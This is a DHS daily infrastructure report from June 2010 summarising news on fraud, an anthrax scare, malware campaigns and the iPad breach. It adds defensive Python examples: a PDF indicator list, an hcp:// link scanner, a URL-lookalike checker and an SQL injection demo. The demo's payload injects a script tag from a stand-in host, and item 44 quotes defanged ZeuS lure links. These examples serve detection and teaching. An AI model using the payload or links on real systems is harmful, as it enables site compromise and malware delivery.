Department of Homeland Security Daily Open Source Infrastructure Report

Friday, June 11, 2010

Complete DHS Daily Report for June 11, 2010

Daily Report

Top Stories

• According to The Hill, Lawmakers June 9 expressed outrage that a supervisor with the Capitol Visitor Center (CVC) in Washington D.C. flushed a white powder from a plastic bag labeled “Anthrax” down a toilet at the Capitol while hundreds of tourists milled around nearby. (See item 33)

33. June 9, The Hill – (District of Columbia) Official flushes ‘anthrax’ down Capitol toilet with hundreds of tourists nearby. Lawmakers June 9 expressed outrage that a supervisor with the Capitol Visitor Center (CVC) in Washington D.C. flushed a white powder from a plastic bag labeled “Anthrax” down a toilet at the Capitol while hundreds of tourists milled around nearby. After being notified by a visitor assistant that the powder-filled bag was in the CVC’s Exhibition Hall, an operational supervisor allegedly retrieved a pair of plastic gloves and brought it to a nearby bathroom and flushed its contents down a toilet. About an hour later, Capitol Police were notified. The hazardous devices unit found no traces of harmful biological components, such as anthrax spores, during an inspection June 5 that covered the restroom, the route the supervisor allegedly took there and the area where the bag was found. The Hill is not naming the operational supervisor who flushed the substance because the identity of the employee has not been confirmed by an on-the-record source. Source: http://thehill.com/homenews/house/102213-guide-flushes-anthrax-down-capitol-toilet-with-tourists-nearby

• IDG News Service reports that Internet users have been hit by a widespread Web attack that has compromised thousands of Web sites, including Web pages belonging to the Wall Street Journal and the Jerusalem Post. Estimates of the total number of compromised Web sites vary between 7,000 and 114,000, according to security experts. (See item 43 below in the Information Technology Sector)

Details

Banking and Finance Sector

9. June 10, Wall Street Journal – (New York) FBI raids alleged boiler room. A suspected member of the Bonanno organized-crime family, and half a dozen others, were arrested in a dawn raid June 9, quickly followed by a search and seizure of an alleged “boiler room” operation in Manhattan’s Garment District. The main suspect, described by law-enforcement officials as a Bonanno soldier, was accused of masterminding an alleged 10-year investment scam that hoodwinked mostly elderly investors out of more than $12 million. In total, 13 people were indicted in the case. The main suspect and seven others arrested in New York June 9 pleaded not guilty at a hearing in Manhattan. One person was expected to appear in court in Pennsylvania, another was scheduled to appear in a Florida court, and two others were expected to surrender at a later date, law-enforcement officials said. One person remained at large. In a boiler-room scam, brokers typically use high-pressure sales tactics, usually by telephone, to induce potential clients to invest. According to the June 9 criminal indictment, the main suspect and his co-defendants allegedly pressured mostly elderly investors into buying shares in several companies — including a Florida online-broadcast provider called Realcast, which allegedly used the operation to solicit investors. At least 40 percent of the money from investors was allegedly used to pay “commissions” to members of the purported boiler room. Source: http://online.wsj.com/article/SB10001424052748703890904575297220025441524.html?mod=WSJ_hpp_sections_newyork


10. June 10, Courthouse News Service – (International) $11 million Latin American Ponzi alleged. Investors say a Latin American corporation took them for $11 million in a Ponzi scheme, and charged exorbitant commissions on futures trading along the way. The 18 individual and corporate plaintiffs claim that Alaron Trading Corp. charged them “$42 per round turn contract, almost three times the going rate, and shared the grossly inflated commission charges” with a Guatemalan company. They sued Alaron Trading Corp. dba Alaron Latin America, and its organizers. According to the complaint in Chicago federal court, the defendants “regularly traveled to Guatemala and other Latin American countries to participate in marketing and promotion events to solicit and induce potential investors to open accounts.” The plaintiffs say the defendants shared their “grossly inflated commission(s)” with Mercados de Futuros (MDF), a Guatemalan company. They say they realized it was a scam when “the MDF offices were finally shut down as a result of a Guatemalan governmental criminal investigation.” Source: http://www.courthousenews.com/2010/06/10/27968.htm


11. June 9, The Register – (International) Malaysian cops bust SMS scam ring. Malaysian cops have busted an alleged text message spam scam ring thought to have fleeced locals for hundreds of thousands of dollars. The group - a Malaysian and 25 foreigners aged between 16 and 41 - are suspected of raking in RM6.4m ($1.9m) between 2006 and April 2010 using fictitious lottery winnings as a bait for an advanced-fee fraud, the Star Malaysia reports. The federal commercial crimes investigations department (CCID) boss told reporters at a press conference June 7 that the group is actually part of an even larger SMS scam syndicate busted last year in Malaysia’s Tawau province. Police are hunting for two suspects who escaped last week’s dragnet, during which police seized four laptops, 73 mobiles, 41 accounting ledgers, ATM and credit cards and RM6,000 ($1,800) in cash. Investigators reckon the laptops were used to distribute the SMS messages that formed the central part of the scam. Would-be marks were told they had won prizes from major corporations such as Petronas, Shell and Maxis. The messages said that victims needed to make payments into local bank accounts before they would be able to collect their supposed winnings, which never materialized. Bank accounts linked to the scam are under investigation. Source: http://www.theregister.co.uk/2010/06/09/malaysian_sms_scam_ring/


12. June 9, WDIV-TV 4 Detroit – (Michigan) ATM skimmer striking Washtenaw Co. Washtenaw County authorities are asking the public to be on the lookout for a man who is accused of trying to steal ATM card numbers. A Washtenaw County Sheriff’s Department spokesman said the man was caught on ATM surveillance cameras May 30 placing a skimming device on an ATM at a Bank of America branch on West Michigan Avenue in Ypsilanti Township. The spokesman said the device at the Bank of America was discovered and removed by bank employees before any losses were reported. Source: http://www.clickondetroit.com/news/23848220/detail.html


13. June 9, KDVR Denver – (Colorado) Police searching for ‘Perennial Bandit’ after bank robbery. Bank of the West at 2050 S. Downing St. in Denver was robbed on Wednesday afternoon by a man the FBI has dubbed the “Perennial Bandit.” The suspect, described as a white male with a blonde buzz cut in his early 20s, standing 5 feet 9 inches and weighing approximately 175 lbs., presented a note to the teller demanding money. He is also believed to be responsible for another robbery of the same bank on June 11, 2009. His yearly pattern of blooming crime has led law enforcement to dub him the “Perennial Bandit,” as he only seems to pop up once per year. Source: http://www.kwgn.com/news/kdvr-fbi-looking-for-perennial-bandit-txt,0,5589480.story


14. June 9, Wayne Independent – (Pennsylvania) Honesdale police: Beware of bank scam. There is a scam reported in Honesdale, Pennsylvania using the name of a local bank. Honesdale Borough Police said they received numerous calls from people stating that they received a phone call regarding their debit or credit card at the Wayne Bank. The automated call states: “Your Wayne Bank card has been deactivated and press Option 1 for the Security Department,” according to Honesdale Police. The Honesdale Police would like to remind the public not to conduct any type of banking business via an automated phone call. People who receive such a call should simply hang up. Source: http://www.wayneindependent.com/news/x1932556076/Honesdale-Police-Beware-of-bank-scam

15. June 9, Chippewa Herald – (Wisconsin) Update: Three area law enforcement agencies warn of financial phone scam. Three Wisconsin-area law enforcement agencies are warning about a phone financial scam where an automated recording says the credit card of the person getting the call has been deactivated. The automated call instructs the person receiving the call to press #1 to enter information. “The caller I.D. for many of these phone calls shows the number 1-817-688-7853. If you attempt to contact this number, you will be advised that it is out of service,” Eau Claire Police said in a press release June 9. Chippewa Falls Police, the Chippewa County Sheriff’s Department, and Eau Claire Police are warning residents to be extremely wary of this scam. Each department said they received a high number of complaints about the scam June 9. Source: http://www.chippewa.com/news/local/article_151a2d3a-73e7-11df-9279-001cc4c03286.html


Information Technology


38. June 10, The New New Internet – (International) Botnet targeting Mexicans taken down by owner. A botnet that was being used to target Mexicans has been taken down, apparently by the cyber criminal who set it up, according to TrendMicro. “The botnet appears to have been taken down by the owners themselves,” wrote a senior threat researcher with TrendMicro. “The botnet’s controllers sent out new instructions to all of the active bots,” he wrote. “One of the effects of this was to stop all of the bots’ phishing attacks perhaps because our own post exposed all of the proxy servers and redirected hosts used in those attacks.” After taking down the so-called Tequila botnet, the cyber criminal(s) set up a second one, dubbed Mariachi botnet, which was also rapidly dismantled. “Both the Mariachi and Tequila botnets went offline after their command-and-control (C&C) servers were taken down. The Mariachi botnet’s C&C server appears to have been taken down by its hosting provider, Bluehost,” the researcher wrote. Source: http://www.thenewnewinternet.com/2010/06/10/botnet-targeting-mexicans-taken-down-by-owner/


39. June 10, SC Magazine – (International) New zero-day vulnerability in Microsoft Windows XP and 2003 discovered. Microsoft has warned of a new zero-day vulnerability for Windows XP/2003, just two days after its monthly Patch Tuesday. The vulnerability is in the Windows Help and Support Center component and is accessed through the protocol handler “hcp://.” A researcher who discovered and detailed the vulnerability claimed on his Twitter feed that “the risk is too high to keep this one quiet.” He said that upon successful exploitation, a remote attacker is able to execute arbitrary commands with the privileges of the current user. He said: “Some minor modifications will be required to target other configurations, this is simply an attempt to demonstrate the problem. I’m sure the smart guys at Metasploit will work on designing reliable attacks, as security professionals require these to do their jobs.” In terms of affected software, the researcher said: “At least Microsoft Windows XP and Windows Server 2003 are affected. The attack is enhanced against IE8 and other major browsers if Windows Media Player is available, but an installation is still vulnerable without it. Machines running version of IE less than 8 are, as usual, in even more trouble.” Source: http://www.scmagazineuk.com/new-zero-day-vulnerability-in-microsoft-windows-xp-and-2003-discovered/article/172078/
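The item above identifies the attack surface as the hcp:// protocol handler, which means a web or mail gateway can at least spot content that tries to invoke it. The following is an added example, not code from the article or from the researcher it quotes: a small Python scanner that pulls URI-bearing attribute values and bare hcp: tokens out of HTML, decodes HTML entities and percent-encoding so that obfuscated spellings collapse to the plain scheme, and returns the distinct hcp: URIs it finds. The sample HTML is constructed for the demonstration; the attribute list is an assumption and could be extended.

```python
import html
import re
from urllib.parse import unquote

# Attribute values where a URI can appear, plus bare hcp: tokens in text.
# The attribute list is an assumption for this example; extend it as needed.
ATTR_VALUE = re.compile(r"""(?:href|src|action|data)\s*=\s*["']([^"']+)["']""",
                        re.IGNORECASE)
BARE_HCP = re.compile(r"""hcp:[^\s"'<>]+""", re.IGNORECASE)
HCP_SCHEME = re.compile(r"\bhcp:", re.IGNORECASE)


def normalize(value: str, rounds: int = 3) -> str:
    """Undo HTML entities and percent-encoding a few times so obfuscated
    spellings such as &#104;cp%3A// collapse to hcp://."""
    text = value
    for _ in range(rounds):
        decoded = unquote(html.unescape(text))
        if decoded == text:
            break
        text = decoded
    return text


def find_hcp_uris(document: str) -> list:
    """Return the distinct URIs in `document` that decode to the hcp: scheme,
    in their original (undecoded) form so an analyst sees what was sent."""
    hits, seen = [], set()
    for candidate in ATTR_VALUE.findall(document) + BARE_HCP.findall(document):
        decoded = normalize(candidate)
        if HCP_SCHEME.search(decoded) and decoded not in seen:
            seen.add(decoded)
            hits.append(candidate)
    return hits


# Constructed sample page: one plain hcp: link, one benign iframe, one
# entity/percent-obfuscated hcp: link, one upper-case variant.
SAMPLE_HTML = """<a href="hcp://services/search?query=test">help</a>
<iframe src="http://example.test/frame"></iframe>
<a href="&#104;cp%3A//services/search?query=other">obfuscated</a>
<a href="HCP://services/">upper</a>
"""

if __name__ == "__main__":
    for uri in find_hcp_uris(SAMPLE_HTML):
        print("hcp: URI found:", uri)
```

Anything this returns on inbound mail or proxied web content deserves a block or a quarantine while the hosts are unpatched; legitimate pages have no reason to link into the local Help and Support Center.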


40. June 10, Help Net Security – (International) Drive-by download attack disguised by Canadian Pharmacy Web site. Red Condor issued a June 10 warning of a new, sophisticated e-mail malware threat that spoofs YouTube and uses a redirect on a compromised Web site to a common Canadian Pharmacy Web site to distribute malicious PDFs via drive-by download. The pharmacy page is actually a red herring that has distracted many security researchers from the true motive of these campaigns, a stealth drive-by download. With a single click, users can infect their computers. The malware, which as of the morning of June 9 had not been detected by any anti-virus engines, comes as a malicious PDF download. Red Condor has captured 10 versions of the malicious PDF, which likely exploits vulnerabilities in Adobe Acrobat. The campaign appears to be part of a much larger attack first detected by the company several weeks ago and has also recently spoofed Facebook and Twitter, among other popular brands. As unsuspecting users wait for what they believe is a YouTube or Twitter friend request, a greeting card, or even a Facebook log-in page to load, their browsers download and execute the malicious code, and then the Canadian Pharmacy page appears. “The amount of effort behind these new campaigns is not commensurate with the typical Canadian Pharmacy spam campaigns that we have seen in the past,” said the CEO of Red Condor. Source: http://www.net-security.org/malware_news.php?id=1372


41. June 10, The H Security – (International) Exploit for new Flash vulnerability spreading fast. According to a number of anti-virus software vendors, an exploit for the unpatched vulnerability in Adobe’s Flash Player and Reader is spreading rapidly, and a number of Web sites are already spreading malware by exploiting the vulnerability. The vulnerability affects Flash Player 10.0.45.2 and earlier, and the authplay.dll library included with Reader and Acrobat 9.x. According to several independent analyses, the exploit is based on a Flash demo for implementing the AES encryption algorithm written in ActionScript. The exploit replaces just a single line (getproperty instead of newfunction), but this substitution makes a mess of the ActionScript stack. This apparently allows additional x86 code to be written to the PC’s memory via Flash Player’s just-in-time compiler and executed. A detailed analysis of the exploit can be found in “A brief analysis of a malicious PDF file which exploits this week’s Flash 0-day.” Crafted Web sites are already attempting to use the exploit to launch programs which download further malware from the Web, including back doors and Trojans. Adobe has announced that it is to release an update for Flash Player June 10. The update for Adobe Reader and Acrobat will be released June 29, two weeks prior to the regular quarterly patch day. Source: http://www.h-online.com/security/news/item/Exploit-for-new-Flash-vulnerability-spreading-fast-1019485.html
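Items 40 and 41 both describe malicious PDFs arriving before anti-virus engines recognize them, in item 41 carrying Flash content that reaches the vulnerable authplay.dll path inside Reader. Until signatures exist, a mail gateway or incident responder can triage PDFs structurally. The following is an added example, not code from either article or from Adobe: a Python keyword scanner in the style of pdfid that decodes hex-escaped PDF names (so /J#61vaScript cannot hide /JavaScript), counts names associated with auto-run JavaScript, launch actions and embedded Flash, and returns a coarse verdict. The sample PDF fragments are constructed for the demonstration and are not valid, renderable files; the keyword list is an assumption and not exhaustive.

```python
import re

# PDF name objects that routinely show up in malicious documents. This list is
# an assumption for the example; real triage tools track more of them.
SUSPICIOUS = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
              "/RichMedia", "/Flash", "/EmbeddedFile")


def decode_names(data: bytes) -> bytes:
    """PDF names may hex-escape characters: /J#61vaScript is /JavaScript.
    Undo that so a keyword scan cannot be dodged by escaping one letter."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> dict:
    """Count each suspicious name, requiring a non-alphanumeric character after
    it so that /RichMedia does not also count /RichMediaSettings."""
    text = decode_names(data)
    return {name: len(re.findall(re.escape(name.encode()) + rb"(?![A-Za-z0-9])", text))
            for name in SUSPICIOUS}


def verdict(data: bytes) -> str:
    """Coarse routing decision for a mail gateway or triage queue."""
    c = count_keywords(data)
    if c["/RichMedia"] or c["/Flash"]:
        return "embedded-flash"          # reaches authplay.dll inside Reader; sandbox it
    if (c["/JavaScript"] or c["/JS"]) and (c["/OpenAction"] or c["/AA"]):
        return "auto-run-javascript"     # script fires on open without user action
    if c["/Launch"]:
        return "launch-action"           # can start an external program
    return "no-indicators"


# Constructed fragment: JavaScript wired to /OpenAction, with the name escaped,
# plus a RichMedia annotation carrying a Flash instance.
SAMPLE_PDF = b"""%PDF-1.6
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
3 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj
4 0 obj << /Type /Annot /Subtype /RichMedia /RichMediaSettings << >> >> endobj
5 0 obj << /Type /RichMediaInstance /Subtype /Flash /Asset 6 0 R >> endobj
"""

# Constructed fragment with none of the indicators.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
"""

if __name__ == "__main__":
    print(count_keywords(SAMPLE_PDF))
    print("sample:", verdict(SAMPLE_PDF), "| benign:", verdict(BENIGN_PDF))
```

This is a plain-text scan: content inside compressed object streams (/ObjStm with /FlateDecode) is invisible to it, so a clean result means only that no indicators were found in the uncompressed bytes. It is a cheap first filter ahead of detonation, not a replacement for it.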


42. June 9, Washington Post – (International) AT&T: Security gap exposed Apple iPad e-mail addresses, IDs. AT&T said late June 9 that a security breach had exposed the e-mail addresses of Apple iPad users. The nation’s second-largest wireless service provider said that the problem had been fixed and that it would inform customers of the breach, which also exposed their iPad identification numbers used to authenticate a wireless user. Gawker reported that the information was obtained by a hacker group calling itself Goatse Security. The group used a script on AT&T’s Web site, accessible to anyone on the Internet, to get the data. The hacker group obtained the e-mail addresses of top-level politicians, television reporters and business executives, including the White House chief of staff. AT&T did not say how many customers were affected. But Gawker, which reported the breach June 9, said 114,000 e-mail addresses were exposed. Apple, which says it has sold 2 million iPads since it was launched last April, did not immediately respond to an interview request. “The issue has escalated to the highest levels of the company and was corrected by [June 8]; and we have essentially turned off the feature that provided the e-mail addresses,” AT&T said in a statement. Source: http://voices.washingtonpost.com/posttech/2010/06/att_says_security_hole_exposed.html?hpid=topnews


43. June 9, IDG News Service – (International) Mass Web attack hits Wall Street Journal, Jerusalem Post. Internet users have been hit by a widespread Web attack that has compromised thousands of Web sites, including Web pages belonging to the Wall Street Journal and the Jerusalem Post. Estimates of the total number of compromised Web sites vary between 7,000 and 114,000, according to security experts. Other compromised sites include Servicewomen.org and Intljobs.org. Cisco Systems’ Web-tracking subsidiary, ScanSafe, started following the incident two days ago, said a senior security researcher with Cisco. Somehow, the hackers have posted malicious HTML code on the affected Web sites that redirects victims to a malicious Web server. This server tries to install software on Web visitors’ computers. If it is successful, the software gives the criminals a way to remotely control their victims’ PCs. Security researchers are still gathering data on the attacks, but they suspect that hackers used an SQL injection attack to trick the Web sites into running database commands, which ultimately gave the hackers a way of installing their malicious HTML. All of the infected sites appear to be using the Microsoft Internet Information Services Web-server software running with Active Server Pages, according to researchers at Sucuri Security. Source: http://www.computerworld.com/s/article/9177904/Mass_Web_attack_hits_Wall_Street_Journal_Jerusalem_Post
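Researchers in the item above suspect SQL injection as the way the malicious HTML reached thousands of IIS/ASP sites: the injected statements rewrite stored page content rather than attacking visitors directly. The following is an added example, not code from the article or from any of the affected sites: a Python script against an in-memory SQLite database that shows a string-concatenated lookup of the kind classic ASP pages commonly used, the payload shape that turns one slug lookup into a site-wide UPDATE, and the parameterized lookup that defeats it. SQLite's `execute()` runs a single statement, so `run_batch()` stands in for a backend that accepts batched statements (SQL Server does); the table, the slugs and the attacker host malicious.example are all constructed for the demonstration.

```python
import sqlite3

# Constructed attacker-controlled script location; not from the article.
INJECTED_TAG = '<script src="http://malicious.example/x.js"></script>'


def make_db() -> sqlite3.Connection:
    """Toy content store standing in for a site's page table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, slug TEXT, body TEXT);
        INSERT INTO pages (slug, body) VALUES ('home', '<h1>Home</h1>');
        INSERT INTO pages (slug, body) VALUES ('about', '<h1>About</h1>');
    """)
    return db


def run_batch(db: sqlite3.Connection, sql: str) -> list:
    """Simulate a batch-capable backend: every ';'-separated statement runs,
    not just the first. Comment-only trailers ('-- ...') are skipped."""
    rows = []
    for stmt in (s.strip() for s in sql.split(";")):
        if stmt and not stmt.startswith("--"):
            rows.extend(db.execute(stmt).fetchall())
    db.commit()
    return rows


def lookup_vulnerable(db: sqlite3.Connection, slug: str) -> list:
    """String concatenation: the slug is interpreted as SQL, not as data."""
    sql = "SELECT body FROM pages WHERE slug = '" + slug + "'"
    return run_batch(db, sql)


def lookup_hardened(db: sqlite3.Connection, slug: str) -> list:
    """Parameterized query: the slug is bound as a value and can never
    terminate the string literal or append a statement."""
    return db.execute("SELECT body FROM pages WHERE slug = ?", (slug,)).fetchall()


def infected_pages(db: sqlite3.Connection) -> list:
    """Slugs whose stored HTML now carries a script tag (what a site owner
    would query to scope the cleanup)."""
    return [row[0] for row in db.execute(
        "SELECT slug FROM pages WHERE body LIKE '%<script%' ORDER BY slug")]


# Payload shape: close the string literal, append an UPDATE that concatenates
# the tag onto every page body, then comment out the trailing quote.
# (SQLite concatenates with ||; SQL Server uses + for the same effect.)
ATTACK_SLUG = "home'; UPDATE pages SET body = body || '" + INJECTED_TAG + "'; --"

if __name__ == "__main__":
    db = make_db()
    print("hardened:", lookup_hardened(db, ATTACK_SLUG), infected_pages(db))
    print("vulnerable:", lookup_vulnerable(db, ATTACK_SLUG), infected_pages(db))
```

Note that the vulnerable lookup still answers the original SELECT correctly, so the page renders normally and nothing looks wrong to the site; the only visible change is the extra script tag now served from every page. Scanning stored content for unexpected script or iframe tags, as `infected_pages()` does, is how the researchers quoted above would have scoped the compromise.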


44. June 9, Krebs on Security – (National) ZeuS trojan attack spoofs IRS, Twitter, Youtube. Criminals have launched a major e-mail campaign to deploy the infamous ZeuS Trojan, blasting out spam messages variously disguised as fraud alerts from the Internal Revenue Service, Twitter account hijack warnings, and salacious Youtube.com videos. According to the director of research in computer forensics at the University of Alabama, Birmingham, this latest attack appears to be an extension of a broad malware spam campaign that began at the end of May. The fake IRS e-mails arrive with the tried-and-true subject line “Notice of Underreported Income,” and encourage the recipient to click a link to review their tax statement. All of the latest e-mails use a variety of URL shortening services. For example, the shortened link hxxp://qurl.com/zv9j7 (live and dangerous at the time of writing, and therefore neutered here) resolves when clicked to hxxp://qqq.irs.gov.vrddr.ru/fraud_application/directory/statement.php?tid=00000143073750US, which takes the user to one of dozens of identical Web pages that spoof the IRS and encourage visitors to download and review their tax statement, which is of course a powerful and stealthy password-stealing program. The director said anti-virus detection for this malware is extremely low: Only three out of 40 different anti-virus products detected the file as malicious, yet none of those currently identify it for what it is: Another new version of the ZeuS Trojan. Source: http://krebsonsecurity.com/2010/06/zeus-trojan-attack-spoofs-irs-twitter-youtube/
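The landing URL in the item above shows the two tricks that make the lure work: a shortener hides the destination, and the destination host front-loads the spoofed brand (qqq.irs.gov.vrddr.ru) even though the registrable domain is vrddr.ru. The following is an added example, not code from the post or from the researcher it cites: a Python classifier that refangs hxxp:// links, extracts the host, derives a registrable domain, and reports whether a URL is a known shortener (so it must be expanded before judgement), a trusted brand domain, or a lookalike that embeds a brand as a subdomain label. The brand list comes from the brands the post says are spoofed; the shortener list and the two-label registrable-domain rule are simplifying assumptions.

```python
import re
from urllib.parse import urlparse

# Brands the campaign spoofs, per the post. The shortener list is an
# assumption for illustration; a gateway would use a maintained list.
PROTECTED = ("irs.gov", "twitter.com", "youtube.com")
SHORTENERS = ("qurl.com", "bit.ly", "tinyurl.com")


def refang(url: str) -> str:
    """Turn defanged hxxp:// and hxxps:// back into a parseable scheme."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def registrable_domain(host: str) -> str:
    """Naive eTLD+1: the last two labels. Adequate for .com, .ru and .gov as
    used here; production code must consult the Public Suffix List, since
    two labels are wrong for suffixes such as co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(url: str) -> str:
    """Return 'shortener', 'trusted', 'lookalike:<brand>' or 'unknown'."""
    host = (urlparse(refang(url)).hostname or "").lower()
    domain = registrable_domain(host)
    if domain in SHORTENERS:
        return "shortener"      # the real target is hidden; expand before judging
    if domain in PROTECTED:
        return "trusted"        # the brand actually owns this host
    for brand in PROTECTED:
        # The brand appears as a run of labels but is not the registrable
        # domain: qqq.irs.gov.vrddr.ru belongs to whoever registered vrddr.ru.
        if ("." + host + ".").find("." + brand + ".") != -1:
            return "lookalike:" + brand
    return "unknown"


if __name__ == "__main__":
    # The two neutered links from the post, plus a genuine IRS URL for contrast.
    for link in ("hxxp://qurl.com/zv9j7",
                 "hxxp://qqq.irs.gov.vrddr.ru/fraud_application/directory/statement.php?tid=00000143073750US",
                 "https://www.irs.gov/"):
        print(classify(link), "<-", link)
```

The lookalike rule deliberately keys on whole labels, so irs.gov inside irs.gov.vrddr.ru is caught while an unrelated host such as airs.gov.example would not be; the cost is that it misses single-label typosquats (irs-gov.example), which need a separate edit-distance check.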


Communications Sector

45. June 9, IDG News Service – (National) USDA details first round of broadband funding. A first round of funding for broadband projects from the U.S. Department of Agriculture’s Rural Utilities Service will bring broadband availability to nearly 530,000 households and 93,000 businesses, the USDA said June 9. The first round of broadband funding, made available through the huge economic stimulus bill, the American Recovery and Reinvestment Act (ARRA), will create about 5,000 new jobs, the USDA Secretary said during a press conference. New jobs would include workers to build broadband networks and lay fiber, and Internet service provider positions after the networks are in place, he said. In the first round of funding, the USDA awarded $1.07 billion to 68 projects in 31 states and one U.S. territory, he said. In addition to households and businesses, the funding will bring broadband to more than 3,000 schools, hospitals and other community anchor institutions, he said. About 14 million U.S. residents lack access to broadband. The USDA’s goal in its two rounds of broadband grants and loans is to reach 1.2 million households, 230,000 businesses and close to 8,000 anchor institutions. The broadband investments will help farmers and ranchers have real-time information on weather and prices, help schools offer new courses through distance learning, help rural hospitals offer new services through telemedicine, and help rural businesses gain access to a global market. Source: http://www.computerworld.com/s/article/9177900/USDA_details_first_round_of_broadband_funding


46. June 9, IDG News Service – (National) Tech companies form group to study net neutrality. A group of technology and telecom companies has launched a new broadband technical advisory committee that will look into ways to resolve net neutrality issues and other network-management challenges. The new committee, called the Broadband Internet Technical Advisory Group, or TAG, will attempt to bring together engineers and other technical experts to develop consensus on broadband network-management practices and related issues, TAG said in a press release. TAG will focus on educating U.S. policymakers on technical issues and on addressing technical issues in an effort to minimize policy disputes, the group said. The group will try to inform federal agencies, including the Federal Communications Commission (FCC), the Federal Trade Commission, and the U.S. Department of Justice, about the technical issues surrounding network management, the group said in a press release. A professor at the University of Colorado will serve as facilitator for TAG. He is a former chief technologist at the FCC who now serves as executive director of the Silicon Flatirons Center, a technology and law policy center at the University of Colorado. Among the companies participating in forming TAG are AT&T, Cisco Systems, Comcast, DISH Network, EchoStar, Google, Intel, Level 3 Communications, Microsoft, Time Warner Cable, and Verizon Communications. Source: http://www.computerworld.com/s/article/9177902/Tech_companies_form_group_to_study_net_neutrality_